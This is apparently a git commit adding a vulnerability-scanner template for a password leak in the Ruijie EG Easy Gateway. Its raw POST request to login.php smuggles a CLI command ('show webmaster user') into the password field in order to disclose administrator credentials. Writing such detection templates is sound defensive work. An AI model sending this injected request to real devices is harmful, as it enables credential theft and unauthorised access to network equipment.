Added ruijie-eg-password-leak

2021-08-06 22:42:41 +05:30 · 2021-08-06 22:42:41 +05:30 · fc1af10daa
parent 5952685f5c
commit fc1af10daa
1 changed files with 40 additions and 0 deletions
--- a/exposures/configs/ruijie-eg-password-leak.yaml
+++ b/exposures/configs/ruijie-eg-password-leak.yaml
@ -0,0 +1,40 @@
+id: ruijie-eg-password-leak
+
+info:
+  name: Ruijie EG Easy Gateway Password Leak
+  author: pdteam
+  severity: high
+  description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability
+  reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
+  vendor: https://www.ruijienetworks.com
+  tags: ruijie,exposure
+
+requests:
+  - raw:
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 49
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+        
+        username=admin&password=admin?show+webmaster+user
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"data":'
+          - '"status":1'
+          - 'admin'
+        condition: and
+        part: body
+
+      - type: word
+        words:
+          - 'text/json'
+        part: header
+
+      - type: status
+        status:
+          - 200